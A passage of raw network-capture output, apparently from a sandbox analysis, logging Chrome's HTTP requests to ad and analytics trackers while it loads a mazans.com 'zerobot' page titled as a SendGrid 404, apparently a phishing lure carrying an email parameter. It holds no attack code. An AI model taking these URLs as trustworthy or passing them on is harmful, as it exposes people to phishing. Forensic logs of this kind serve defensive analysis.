                                                                                                                                                                                                                                                                                                                                                                          105192.168.2.174992754.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC2337OUTGET /tracker/tc_imp.gif?e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46a56a82b9eec47679c796e092818c5871d61eb72bffeb1ba131be20ecca7478c31db6bda508e1547f77303fd1f564c2acf503ed79ffca8328828bf7d8557ec4b7274a7d43169230121e118f58109ac5d6ead83c6771e217dcf965d78c9df014b3545700015a7902c7e7d17c7ab1f28cef2ea2b93e745711b3eb7b4e7c1d965b4cfd908e2529d516b3098e89ae6a231c3daea6dc1345ad0f0c8241f14fe3467a0910678fc86ae668504f745b7980a870d97dd75d66071d2d964d27a8f8fb9b9deb1a00779a972a9dc8f5b4c4dc8ce6596b340bb414f07df5a5387d4ced0c6ec8830c53c9dc3b2877be5722413ab5b00baa9a16901f3c9458c27a7dd0d9070ef25110514dc31bc1cd1cbee27ebd56a964ea9cfdd9b3fce6e752db31e1413261a3087bb60f41d8282c734a29a62ed802bcac2b1be7799a6f54e3e33c5f85956dcb10a4c15f7a0e339f92588f64ebcb83cb86ec364cb07a3568efc2edb0879b5e8cb316e7b395c74195605f4f3907e8553c419171677bc [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC230INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 db df ef 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          106192.168.2.174993091.228.74.2004436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1244OUTGET /pixel;r=914973261;labels=_fp.event.Page%20not%20found%20%7C%20SendGrid;rf=0;a=p-de_F6qVUp9bug;url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED;ref=https%3A%2F%2Fsepedatua.com%2F;ns=0;ce=1;qjs=1;qv=6cdb9339-20241109062824;dst=1;et=1731515356482;tzo=300;ogl=type.website%2Csite_name.SendGrid%2Curl.https%3A%2F%2Fsendgrid%252Ecom%2Fen-us%2F404%2Ctitle.Page%20not%20found%20%7C%20SendGrid%20%2Cdescription.%2Cimage.https%3A%2F%2Fsendgrid%252Ecom%2Fcontent%2Fdam%2Fsendgrid%2Fcore-assets%2Fsocial%2Fsendgrid-default-og;ses=866c6b77-1f69-4857-b1ec-19e8d7f84073;d=mazans.com;uht=2;fpan=1;fpa=P0-2005580295-1731515356484;pbc=;gdpr=0;mdl= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pixel.quantserve.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 35
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Attribution-Reporting-Register-Trigger: {"event_trigger_data":[{"filters":[{"label":["ZERLQY0Zh2Z5pAevlPis0A=="],"pcode":["p-de_F6qVUp9bug"]}],"trigger_data":"1"}]}
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, no-store, proxy-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 04 Aug 1978 12:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: mc=6734d3de-eac9d-cb333-2df9d; expires=Sun, 14-Dec-2025 16:29:18 GMT; path=/; domain=.quantserve.com; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=86400
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC35INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 80 ff ff ff 00 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          107192.168.2.174993246.137.111.1484436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC972OUTGET /pageview?ex=&dt=2445&pvt=n&la=en-US&uc=0&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&dr=https%3A%2F%2Fsepedatua.com%2F&dw=1263&dh=44898&ww=1280&wh=907&sw=1280&sh=1024&uu=392b47b9-fdc5-a91a-dc6e-b9b5c392f625&sn=1&hd=1731515356&v=32bb33fe4ed6e6973ce6df5d79a84ef3f564da91&pid=84712&pn=1&happid=1541905715&hsid=5313631937644667&huu=6112782573225535&r=521041 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: c.contentsquare.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC469INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Access-Control-Expose-Headers, Content-Type, Content-Compression, X-Requested-With
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: inline
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Expires: Sun, 24 Oct 1982 23:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          108192.168.2.174993813.107.246.454436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC422OUTGET /s/0.7.49/clarity.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.clarity.ms
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: CLID=578bbac004b6466f83ade27540643b49.20241113.20251113
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 65959
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 24 Oct 2024 01:20:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DCF3CA14C9A428"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 1c170c6e-801e-0015-513e-2c3968000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241113T162919Z-16547b76f7fkcrm9hC1DFWxdag0000000heg00000000pa3r
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 79034942
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC15811INData Raw: 2f 2a 20 63 6c 61 72 69 74 79 2d 6a 73 20 76 30 2e 37 2e 34 39 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2f 63 6c 61 72 69 74 79 20 28 4c 69 63 65 6e 73 65 3a 20 4d 49 54 29 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 67 65 74 20 71 75 65 75 65 28 29 7b 72 65 74 75 72 6e 20 73 72 7d 2c 67 65 74 20 73 74 61 72 74 28 29 7b 72 65 74 75 72 6e 20 63 72 7d 2c 67 65 74 20 73 74 6f 70 28 29 7b 72 65 74 75 72 6e 20 6c 72 7d 2c 67 65 74 20 74 72 61 63 6b 28 29 7b 72 65 74 75 72 6e 20 61 72 7d 7d 29 2c 65 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /* clarity-js v0.7.49: https://github.com/microsoft/clarity (License: MIT) */!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__pro
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC16384INData Raw: 72 3a 6e 75 6c 6c 2c 68 61 73 68 3a 6e 75 6c 6c 2c 72 65 67 69 6f 6e 3a 6c 2c 6d 65 74 61 64 61 74 61 3a 7b 61 63 74 69 76 65 3a 21 30 2c 73 75 73 70 65 6e 64 3a 21 31 2c 70 72 69 76 61 63 79 3a 66 2c 70 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 72 61 75 64 3a 64 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 61 3d 65 2e 64 61 74 61 2c 72 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 72 2e 70 72 69 76 61 63 79 2c 6f 3d 61 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 2c 75 3d 61 2e 74 61 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 50 74 2e 69 6e 64 65 78 4f 66 28 75 29 3e 3d 30 3a 76 61 72 20 63 3d 6f 2e 74 79 70 65 2c 73 3d 22 22 2c 6c 3d 5b 22 63 6c 61 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: r:null,hash:null,region:l,metadata:{active:!0,suspend:!1,privacy:f,position:null,fraud:d,size:null}},function(t,e,n){var a=e.data,r=e.metadata,i=r.privacy,o=a.attributes||{},u=a.tag.toUpperCase();switch(!0){case Pt.indexOf(u)>=0:var c=o.type,s="",l=["clas
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC16384INData Raw: 62 69 6c 69 74 79 29 2c 47 72 28 31 34 2c 74 2e 69 74 65 6d 43 6f 6e 64 69 74 69 6f 6e 29 2c 47 72 28 31 33 2c 74 2e 70 72 69 63 65 43 75 72 72 65 6e 63 79 29 2c 47 72 28 31 32 2c 74 2e 73 6b 75 29 2c 57 28 31 33 2c 5a 6e 28 74 2e 70 72 69 63 65 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 62 72 61 6e 64 22 3a 47 72 28 36 2c 74 2e 6e 61 6d 65 29 7d 6e 75 6c 6c 21 3d 3d 72 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 4b 6e 28 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 6e 28 74 2c 65 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 29 2c 6e 75 6c 6c 21 3d 3d 74 29 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2a 65 29 3b 63 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: bility),Gr(14,t.itemCondition),Gr(13,t.priceCurrency),Gr(12,t.sku),W(13,Zn(t.price));break;case"brand":Gr(6,t.name)}null!==r&&"object"==typeof r&&Kn(r)}}function Zn(t,e){if(void 0===e&&(e=1),null!==t)switch(typeof t){case"number":return Math.round(t*e);ca
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC16384INData Raw: 53 74 2e 69 64 29 2c 65 2e 70 75 73 68 28 53 74 2e 74 61 72 67 65 74 29 2c 65 2e 70 75 73 68 28 53 74 2e 63 68 65 63 6b 73 75 6d 29 2c 73 72 28 65 2c 21 31 29 29 7d 72 65 74 75 72 6e 5b 32 5d 7d 29 29 7d 29 29 7d 76 61 72 20 62 72 2c 77 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 72 28 74 2c 65 2c 6e 2c 61 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 61 26 26 28 61 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 6e 75 6c 6c 29 3b 76 61 72 20 69 3d 6e 3f 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 7c 22 29 2e 63 6f 6e 63 61 74 28 61 29 3a 22 22 3b 74 20 69 6e 20 77 72 26 26 77 72 5b 74 5d 2e 69 6e 64 65 78 4f 66 28 69 29 3e 3d 30 7c 7c 28 62 72 3d 7b 63 6f 64 65 3a 74 2c 6e 61 6d 65 3a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: St.id),e.push(St.target),e.push(St.checksum),sr(e,!1))}return[2]}))}))}var br,wr={};function kr(t,e,n,a,r){void 0===n&&(n=null),void 0===a&&(a=null),void 0===r&&(r=null);var i=n?"".concat(n,"|").concat(a):"";t in wr&&wr[t].indexOf(i)>=0||(br={code:t,name:
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC996INData Raw: 57 69 28 74 29 2c 7a 69 28 29 2c 62 74 28 29 2c 24 69 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 69 28 74 2e 73 74 61 72 74 29 28 29 7d 29 29 2c 6e 75 6c 6c 3d 3d 3d 74 26 26 69 6f 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 65 6f 28 29 7b 50 69 28 29 26 26 28 24 69 2e 73 6c 69 63 65 28 29 2e 72 65 76 65 72 73 65 28 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 69 28 74 2e 73 74 6f 70 29 28 29 7d 29 29 2c 77 74 28 29 2c 48 69 28 29 2c 76 6f 69 64 20 30 21 3d 3d 61 6f 26 26 28 61 6f 5b 72 6f 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 28 61 6f 5b 72 6f 5d 2e 71 3d 61 6f 5b 72 6f 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 2c 22 73 74 61 72 74 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Wi(t),zi(),bt(),$i.forEach((function(t){return Oi(t.start)()})),null===t&&io())}function eo(){Pi()&&($i.slice().reverse().forEach((function(t){return Oi(t.stop)()})),wt(),Hi(),void 0!==ao&&(ao[ro]=function(){(ao[ro].q=ao[ro].q||[]).push(arguments),"start"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          109192.168.2.174993435.160.151.2204436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC342OUTGET /v1/p HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: api.segment.io
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC195INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 82
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC82INData Raw: 7b 0a 20 20 22 73 75 63 63 65 73 73 22 3a 20 66 61 6c 73 65 2c 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6d 61 6c 66 6f 72 6d 65 64 20 4a 53 4f 4e 22 2c 0a 20 20 22 63 6f 64 65 22 3a 20 22 69 6e 76 61 6c 69 64 5f 72 65 71 75 65 73 74 22 0a 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: { "success": false, "message": "malformed JSON", "code": "invalid_request"}


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          110192.168.2.1749937142.250.186.1644436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1479OUTGET /pagead/1p-user-list/923239173/?random=1731515353497&cv=11&fst=1731513600000&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCa7L7d_FlbTcxAkA3WYiine-jPApibz-O4Xg&random=4124225919&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          111192.168.2.1749939157.240.0.354436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
